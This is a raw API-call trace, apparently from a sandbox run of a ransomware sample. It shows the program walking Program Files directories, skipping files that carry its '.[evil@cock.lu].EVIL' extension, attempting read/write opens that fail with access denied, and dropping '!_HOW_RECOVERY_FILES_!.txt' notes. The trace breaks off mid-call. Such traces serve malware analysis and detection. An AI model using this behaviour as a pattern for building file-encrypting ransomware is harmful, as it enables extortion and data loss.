[0090.042] wcscmp (_String1=".", _String2=".") returned 0 [0090.042] FindNextFileW (in: hFindFile=0x84b11dde60, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0090.042] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.042] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\Ole DB\\en-US\\..") returned 53 [0090.042] wcscmp (_String1=".", _String2="..") returned -1 [0090.042] wcscmp (_String1="..", _String2="..") returned 0 [0090.042] FindNextFileW (in: hFindFile=0x84b11dde60, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0090.042] wcsstr (_Str="msdasqlr.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.042] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui") returned 67 [0090.042] wcscmp (_String1="msdasqlr.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.042] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msdasqlr.dll.mui") returned 0x0 [0090.042] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui") returned 0x43 [0090.043] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\msdasqlr.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.043] GetLastError () returned 0x5 [0090.043] FindNextFileW (in: hFindFile=0x84b11dde60, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0090.043] wcsstr (_Str="oledb32r.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.043] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui") returned 67 [0090.043] wcscmp (_String1="oledb32r.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.043] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="oledb32r.dll.mui") returned 0x0 [0090.043] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui") returned 0x43 [0090.043] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\oledb32r.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.043] GetLastError () returned 0x5 [0090.043] FindNextFileW (in: hFindFile=0x84b11dde60, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0090.043] wcsstr (_Str="sqloledb.rll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.043] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui") returned 67 [0090.043] wcscmp (_String1="sqloledb.rll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.043] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="sqloledb.rll.mui") returned 0x0 [0090.043] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui") returned 0x43 [0090.043] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\sqloledb.rll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.043] GetLastError () returned 0x5 [0090.043] FindNextFileW (in: hFindFile=0x84b11dde60, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0090.043] wcsstr (_Str="sqlxmlx.rll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.043] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui") returned 66 [0090.043] wcscmp (_String1="sqlxmlx.rll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.043] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="sqlxmlx.rll.mui") returned 0x0 [0090.044] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui") returned 0x42 [0090.044] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\sqlxmlx.rll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.044] GetLastError () returned 0x5 [0090.044] FindNextFileW (in: hFindFile=0x84b11dde60, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0090.044] FindClose (in: hFindFile=0x84b11dde60 | out: hFindFile=0x84b11dde60) returned 1 [0090.044] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\Ole DB\\en-US") returned 0x32 [0090.044] strlen (_Str="${KEY}") returned 0x6 [0090.044] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0090.044] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0090.044] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0090.044] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\System\\Ole DB\\en-US\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0090.045] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0090.045] __uncaught_exception () returned 0x84b1160800 [0090.045] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0090.046] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.046] wcsstr (_Str="msdaosp.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.046] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\Ole DB\\msdaosp.dll") returned 56 [0090.046] wcscmp (_String1="msdaosp.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.046] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msdaosp.dll") returned 0x0 [0090.046] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\Ole DB\\msdaosp.dll") returned 0x38 [0090.046] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\Ole DB\\msdaosp.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdaosp.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.046] GetLastError () returned 0x5 [0090.046] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.046] wcsstr (_Str="msdaps.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.047] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\Ole DB\\msdaps.dll") returned 55 [0090.047] wcscmp (_String1="msdaps.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.047] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msdaps.dll") returned 0x0 [0090.047] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\Ole DB\\msdaps.dll") returned 0x37 [0090.047] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\Ole DB\\msdaps.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdaps.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.047] GetLastError () returned 0x5 [0090.047] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.047] wcsstr (_Str="msdasql.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.047] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\Ole DB\\msdasql.dll") returned 56 [0090.047] wcscmp (_String1="msdasql.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.047] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msdasql.dll") returned 0x0 [0090.047] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\Ole DB\\msdasql.dll") returned 0x38 [0090.047] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\Ole DB\\msdasql.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdasql.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.047] GetLastError () returned 0x5 [0090.048] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.048] wcsstr (_Str="msdasqlr.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.048] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\Ole DB\\msdasqlr.dll") returned 57 [0090.048] wcscmp (_String1="msdasqlr.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.048] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msdasqlr.dll") returned 0x0 [0090.048] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\Ole DB\\msdasqlr.dll") returned 0x39 [0090.048] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\Ole DB\\msdasqlr.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdasqlr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.048] GetLastError () returned 0x5 [0090.048] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.048] wcsstr (_Str="msdatl3.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.048] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\Ole DB\\msdatl3.dll") returned 56 [0090.048] wcscmp (_String1="msdatl3.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.048] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msdatl3.dll") returned 0x0 [0090.048] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\Ole DB\\msdatl3.dll") returned 0x38 [0090.048] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\Ole DB\\msdatl3.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdatl3.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.049] GetLastError () returned 0x5 [0090.049] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.049] wcsstr (_Str="msxactps.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.049] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\Ole DB\\msxactps.dll") returned 57 [0090.049] wcscmp (_String1="msxactps.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.049] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msxactps.dll") returned 0x0 [0090.049] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\Ole DB\\msxactps.dll") returned 0x39 [0090.049] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\Ole DB\\msxactps.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msxactps.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.049] GetLastError () returned 0x5 [0090.049] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.049] wcsstr (_Str="oledb32.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.049] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\Ole DB\\oledb32.dll") returned 56 [0090.049] wcscmp (_String1="oledb32.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.049] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="oledb32.dll") returned 0x0 [0090.049] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\Ole DB\\oledb32.dll") returned 0x38 [0090.049] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\Ole DB\\oledb32.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\oledb32.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.049] GetLastError () returned 0x5 [0090.049] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.049] wcsstr (_Str="oledb32r.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.049] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\Ole DB\\oledb32r.dll") returned 57 [0090.049] wcscmp (_String1="oledb32r.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.049] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="oledb32r.dll") returned 0x0 [0090.049] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\Ole DB\\oledb32r.dll") returned 0x39 [0090.049] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\Ole DB\\oledb32r.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\oledb32r.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.050] GetLastError () returned 0x5 [0090.050] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.050] wcsstr (_Str="oledbjvs.inc", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.050] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc") returned 57 [0090.050] wcscmp (_String1="oledbjvs.inc", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.050] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="oledbjvs.inc") returned 0x0 [0090.050] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc") returned 0x39 [0090.050] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbjvs.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.050] GetLastError () returned 0x5 [0090.050] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.050] wcsstr (_Str="oledbvbs.inc", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.050] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 57 [0090.050] wcscmp (_String1="oledbvbs.inc", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.050] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="oledbvbs.inc") returned 0x0 [0090.050] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 0x39 [0090.050] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbvbs.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.050] GetLastError () returned 0x5 [0090.050] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.050] wcsstr (_Str="sqloledb.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.050] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.dll") returned 57 [0090.050] wcscmp (_String1="sqloledb.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.050] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="sqloledb.dll") returned 0x0 [0090.050] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.dll") returned 0x39 [0090.050] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\sqloledb.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.051] GetLastError () returned 0x5 [0090.051] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.051] wcsstr (_Str="sqloledb.rll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.051] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.rll") returned 57 [0090.051] wcscmp (_String1="sqloledb.rll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.051] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="sqloledb.rll") returned 0x0 [0090.051] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.rll") returned 0x39 [0090.051] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.rll" (normalized: "c:\\program files\\common files\\system\\ole db\\sqloledb.rll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.051] GetLastError () returned 0x5 [0090.051] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.051] wcsstr (_Str="sqlxmlx.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.051] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.dll") returned 56 [0090.051] wcscmp (_String1="sqlxmlx.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.051] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="sqlxmlx.dll") returned 0x0 [0090.051] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.dll") returned 0x38 [0090.051] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\sqlxmlx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.051] GetLastError () returned 0x5 [0090.051] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.051] wcsstr (_Str="sqlxmlx.rll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.051] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.rll") returned 56 [0090.051] wcscmp (_String1="sqlxmlx.rll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.051] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="sqlxmlx.rll") returned 0x0 [0090.051] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.rll") returned 0x38 [0090.051] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.rll" (normalized: "c:\\program files\\common files\\system\\ole db\\sqlxmlx.rll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.052] GetLastError () returned 0x5 [0090.052] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 0 [0090.052] FindClose (in: hFindFile=0x84b11dd680 | out: hFindFile=0x84b11dd680) returned 1 [0090.052] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\Ole DB") returned 0x2c [0090.052] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0090.052] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0090.052] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\System\\Ole DB\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0090.052] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0090.052] __uncaught_exception () returned 0x84b1160800 [0090.052] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0090.053] FindNextFileW (in: hFindFile=0x84b11dd7a0, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0090.053] wcsstr (_Str="wab32.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.053] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\wab32.dll") returned 47 [0090.053] wcscmp (_String1="wab32.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.053] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="wab32.dll") returned 0x0 [0090.053] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\wab32.dll") returned 0x2f [0090.053] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\wab32.dll" (normalized: "c:\\program files\\common files\\system\\wab32.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.054] GetLastError () returned 0x5 [0090.054] FindNextFileW (in: hFindFile=0x84b11dd7a0, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0090.054] wcsstr (_Str="wab32res.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.054] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\wab32res.dll") returned 50 [0090.054] wcscmp (_String1="wab32res.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.054] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="wab32res.dll") returned 0x0 [0090.054] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\wab32res.dll") returned 0x32 [0090.054] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\wab32res.dll" (normalized: "c:\\program files\\common files\\system\\wab32res.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.054] GetLastError () returned 0x5 [0090.054] FindNextFileW (in: hFindFile=0x84b11dd7a0, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 0 [0090.054] FindClose (in: hFindFile=0x84b11dd7a0 | out: hFindFile=0x84b11dd7a0) returned 1 [0090.054] wcslen (_String="C:\\\\Program Files\\Common Files\\System") returned 0x25 [0090.054] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0090.054] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0090.054] _wfsopen (_FileName="C:\\\\Program Files\\Common 